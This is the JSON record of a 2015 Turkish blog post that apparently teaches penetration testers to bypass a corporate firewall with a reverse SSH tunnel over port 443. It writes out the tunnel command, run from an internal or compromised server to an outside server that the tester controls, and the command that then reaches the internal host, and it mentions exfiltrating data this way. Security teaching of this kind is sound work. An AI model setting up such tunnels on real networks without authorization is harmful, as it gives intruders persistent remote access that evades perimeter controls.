{"id":630,"date":"2015-08-23T22:02:08","date_gmt":"2015-08-23T19:02:08","guid":{"rendered":"https:\/\/furkansandal.com\/?p=630"},"modified":"2015-08-23T22:02:08","modified_gmt":"2015-08-23T19:02:08","slug":"reverse-tunel-ile-kurum-agina-disaridan-sizmak","status":"publish","type":"post","link":"https:\/\/furkansandal.com\/reverse-tunel-ile-kurum-agina-disaridan-sizmak\/","title":{"rendered":"Reverse T\u00fcnel ile Kurum A\u011f\u0131na D\u0131\u015far\u0131dan S\u0131zmak"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_55 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title \" >Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\" role=\"button\"><label for=\"item-662e4e4f1e86a\" ><span class=\"\"><span style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input aria-label=\"Toggle\" aria-label=\"item-662e4e4f1e86a\"  type=\"checkbox\" id=\"item-662e4e4f1e86a\"><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/furkansandal.com\/reverse-tunel-ile-kurum-agina-disaridan-sizmak\/#Reverse_SSH\" title=\"Reverse SSH\">Reverse SSH<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/furkansandal.com\/reverse-tunel-ile-kurum-agina-disaridan-sizmak\/#Kurum_aginda_bulunan_bir_bilgisayara_uzaktan_baglanti_kurmak_istedigimizde_normalde_kurum_firewall%E2%80%99undan_ilgili_port_yonlendirme_ayari_yapilmadan_ve_gerekli_izinler_verilmeden_disaridan_bu_turlu_bir_baglanti_kurmak_mumkun_degildir\" title=\"Kurum a\u011f\u0131nda bulunan bir bilgisayara uzaktan ba\u011flant\u0131 kurmak istedi\u011fimizde, normalde kurum firewall\u2019undan ilgili port y\u00f6nlendirme ayar\u0131 yap\u0131lmadan ve gerekli izinler verilmeden, d\u0131\u015far\u0131dan bu t\u00fcrl\u00fc bir ba\u011flant\u0131 kurmak m\u00fcmk\u00fcn de\u011fildir.\">Kurum a\u011f\u0131nda bulunan bir bilgisayara uzaktan ba\u011flant\u0131 kurmak istedi\u011fimizde, normalde kurum firewall\u2019undan ilgili port y\u00f6nlendirme ayar\u0131 yap\u0131lmadan ve gerekli izinler verilmeden, d\u0131\u015far\u0131dan bu t\u00fcrl\u00fc bir ba\u011flant\u0131 kurmak m\u00fcmk\u00fcn de\u011fildir.<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/furkansandal.com\/reverse-tunel-ile-kurum-agina-disaridan-sizmak\/#Senaryo\" title=\"Senaryo\">Senaryo<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/furkansandal.com\/reverse-tunel-ile-kurum-agina-disaridan-sizmak\/#Test_Adimlari\" title=\"Test Ad\u0131mlar\u0131\">Test Ad\u0131mlar\u0131<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"Reverse_SSH\"><\/span>Reverse SSH<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h2><span class=\"ez-toc-section\" id=\"Kurum_aginda_bulunan_bir_bilgisayara_uzaktan_baglanti_kurmak_istedigimizde_normalde_kurum_firewall%E2%80%99undan_ilgili_port_yonlendirme_ayari_yapilmadan_ve_gerekli_izinler_verilmeden_disaridan_bu_turlu_bir_baglanti_kurmak_mumkun_degildir\"><\/span>Kurum a\u011f\u0131nda bulunan bir bilgisayara uzaktan ba\u011flant\u0131 kurmak istedi\u011fimizde, normalde kurum firewall\u2019undan ilgili port y\u00f6nlendirme ayar\u0131 yap\u0131lmadan ve gerekli izinler verilmeden, d\u0131\u015far\u0131dan bu t\u00fcrl\u00fc bir ba\u011flant\u0131 kurmak m\u00fcmk\u00fcn de\u011fildir.<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><span class=\"ez-toc-section\" id=\"Senaryo\"><\/span>Senaryo<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Bunu a\u015fman\u0131n bir y\u00f6ntemi reverse SSH ba\u011flant\u0131s\u0131 kurmakt\u0131r. Stateful firewallarda, normalde d\u0131\u015far\u0131dan i\u00e7eriye izinli olmayan bir istek(\u00f6rne\u011fin SSH), drop edilir. Fakat e\u011fer istek \u00f6ncelikle i\u00e7eriden olu\u015fturulursa, yani \u00f6nce d\u0131\u015far\u0131daki bir SSH sunucuya i\u00e7eriden ba\u011flant\u0131 iste\u011fi g\u00f6nderilirse, d\u0131\u015far\u0131daki SSH sunucudan i\u00e7eriye yap\u0131lacak olan istekler firewall taraf\u0131ndan engellenmeyebilir. B\u00f6ylelikle kurum firewall\u2019unda ilgili izinler verilmeden, kurum a\u011f\u0131ndaki bilgisayarlara eri\u015filebilir.<br \/>\nBu a\u00e7\u0131kl\u0131k, s\u0131zma testleri s\u0131ras\u0131nda ele ge\u00e7irilen ve d\u0131\u015far\u0131dan eri\u015filemeyen bir sunucunun d\u0131\u015far\u0131dan kontrol edilebilmesine olanak tan\u0131yabilir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Test_Adimlari\"><\/span>Test Ad\u0131mlar\u0131<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>A\u00e7\u0131kl\u0131\u011f\u0131n testi i\u00e7in her iki tarafta da SSH sunucunun bulunmas\u0131 gerekmektedir. \u0130lk SSH sunucu kurum lokalinde bulunan, di\u011fer SSH sunucu ise uzakta bulunan bir sunucudur. Kurum lokalindeki sunucuya A, uzaktaki sunucuya ise B ad\u0131n\u0131 verelim.<\/p>\n<div class=\"separator\"><a href=\"https:\/\/i0.wp.com\/2.bp.blogspot.com\/--8XEeMop-0E\/VQMI7VSBa1I\/AAAAAAAAAMk\/1D_0nBw1dVw\/s1600\/diag-1.png\"><img loading=\"lazy\" decoding=\"async\" title=\"\" src=\"https:\/\/i0.wp.com\/2.bp.blogspot.com\/--8XEeMop-0E\/VQMI7VSBa1I\/AAAAAAAAAMk\/1D_0nBw1dVw\/s1600\/diag-1.png?resize=400%2C227\" alt=\"SSH ile Tersine T\u00fcnel A\u00e7ma,reverse ssh a\u00e7ma\" width=\"400\" height=\"227\" border=\"0\" data-recalc-dims=\"1\" \/><\/a><\/div>\n<p>Test i\u00e7in B sunucusuna yani uzakta ve bizim kontrol\u00fcm\u00fczde bulunan sunucuya port y\u00f6nlendirme yapmam\u0131z gerekecektir. Hangi portun y\u00f6nlendirilece\u011fi konusuna gelince;<br \/>\nY\u00f6nlendirilecek olan portun, A sunucusunun internete \u00e7\u0131kabilece\u011fi ve trafi\u011fi kontrol edilmeyen bir port olmas\u0131 \u00f6nemlidir. \u00d6rnek olarak 443 portunu kullanaca\u011f\u0131z. Bu port SSL trafi\u011fi i\u00e7in kullan\u0131ld\u0131\u011f\u0131ndan, genellikle kurum a\u011flar\u0131ndan d\u0131\u015far\u0131ya do\u011fru eri\u015fim izni verilen bir porttur.<br \/>\nBu nedenle B sunucusunun \u00f6n\u00fcnde bulunan modemden ya da firewalldan, 443 portuna gelen istekleri B sunucusunun 22 portuna y\u00f6nlendirece\u011fiz.<br \/>\nBu i\u015flemden sonra A sunucusundan a\u015fa\u011f\u0131daki gibi bir komut girilmesi gerekmektedir:<br \/>\n<strong><br \/>\n<\/strong> <strong>#ssh \u2013p 443 \u2013f \u2013g \u2013N \u2013R8000:localhost:22 kullanici_adi@IP<\/strong><br \/>\n<strong><br \/>\n<\/strong> Burada ifade etti\u011fimiz 443 portu, A sunucusunun d\u0131\u015far\u0131ya ileti\u015fim kurmak i\u00e7in kulland\u0131\u011f\u0131 porttur. 8000 portu ise, A sunucusu \u00fczerinde ve 22 portunda \u00e7al\u0131\u015fan SSH trafi\u011finin y\u00f6nlendirildi\u011fi porttur. Bir di\u011fer deyi\u015fle modem ya da firewall \u00fczerinde 8000 portuna gelen isteklerin A sunucusundaki 22 portuna y\u00f6nlendirilmesi anlam\u0131n\u0131 ta\u015f\u0131r. Normalde kurum firewall\u2019una ya da modemine eri\u015febilseydik, hi\u00e7 bu i\u015flemlere gerek kalmadan 8000 portunun A sunucusunun 22 portuna y\u00f6nlendirilmesi tan\u0131m\u0131n\u0131 yapabilirdik ancak mal\u00fbm buna yetkimiz yok.<br \/>\nkullanici_adi de\u011feri B sunucusunda oturum a\u00e7mak i\u00e7in kullanaca\u011f\u0131m\u0131z kullan\u0131c\u0131 ad\u0131d\u0131r \u2013 \u00f6rne\u011fin <strong><em>admin<\/em><\/strong>. IP ise B sunucusunun internete \u00e7\u0131kt\u0131\u011f\u0131 IP\u2019dir.<br \/>\nBu ayarlamalardan sonra yukar\u0131da belirtti\u011fimiz komut A sunucusundan girildi\u011finde, e\u011fer herhangi bir engelleme yoksa, B sunucusuna oturum a\u00e7\u0131lacakt\u0131r. Giri\u015fte bizden parola soracak olursa, B sunucusunun parolas\u0131 girilmelidir. Zaten bu sunucu kontrol\u00fcm\u00fcz alt\u0131ndaki bir sunucu oldu\u011fu i\u00e7in parolas\u0131 bilinmektedir.<br \/>\nBa\u011flant\u0131 kurulduktan sonra as\u0131l amac\u0131m\u0131z olan A sunucusuna ba\u011flant\u0131 kurma i\u015flemine ge\u00e7ece\u011fiz. Bunun i\u00e7in B sunucusunda a\u015fa\u011f\u0131daki komut girilmelidir:<\/p>\n<p><strong>#ssh localhost \u2013p 8000<\/strong><\/p>\n<p>Bu komut girildikten sonra bizden yine parola girmemiz istenebilir. Bu durumda A sunucusunun parolas\u0131n\u0131 girdikten sonra oturum a\u00e7\u0131lm\u0131\u015f ve ilk amac\u0131m\u0131z olan B sunucusundan A sunucusuna eri\u015fim sa\u011flanm\u0131\u015f olacakt\u0131r.<br \/>\nBurada A sunucusunun parolas\u0131n\u0131 nereden bildi\u011fimiz sorusu akla gelebilir. A sunucusu, iki farkl\u0131 sunucu olabilir:<br \/>\nBirincisi bizim yine kendi sunucumuz olan ve s\u0131zma testi i\u00e7in kurum lokal a\u011f\u0131na ba\u011flad\u0131\u011f\u0131m\u0131z bir sunucu(PC). \u0130kinci olarak lokalde ele ge\u00e7irdi\u011fimiz ve kendimize bir kullan\u0131c\u0131 a\u00e7t\u0131\u011f\u0131m\u0131z kuruma ait bir sunucu. A sunucusunun t\u00fcr\u00fcne ba\u011fl\u0131 olarak direkt o sunucu \u00fczerinden veri s\u0131zd\u0131rma ya da benzeri ele ge\u00e7irme senaryolar\u0131 uygulanabilece\u011fi gibi testin t\u00fcr\u00fcne ve kapsam\u0131na ba\u011fl\u0131 olarak farkl\u0131 senaryolar da uygulanabilir.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reverse SSH Kurum a\u011f\u0131nda bulunan bir bilgisayara uzaktan ba\u011flant\u0131 kurmak istedi\u011fimizde, normalde kurum firewall\u2019undan ilgili port y\u00f6nlendirme ayar\u0131 yap\u0131lmadan ve&#8230;<\/p>\n","protected":false},"author":1,"featured_media":621,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,7,11,4],"tags":[78,76,26,22,94],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/08\/hacks-mr-robot-build-hacking-raspberry-pi-2.jpg?fit=640%2C244&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-aa","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/630"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=630"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/630\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/621"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=630"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=630"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}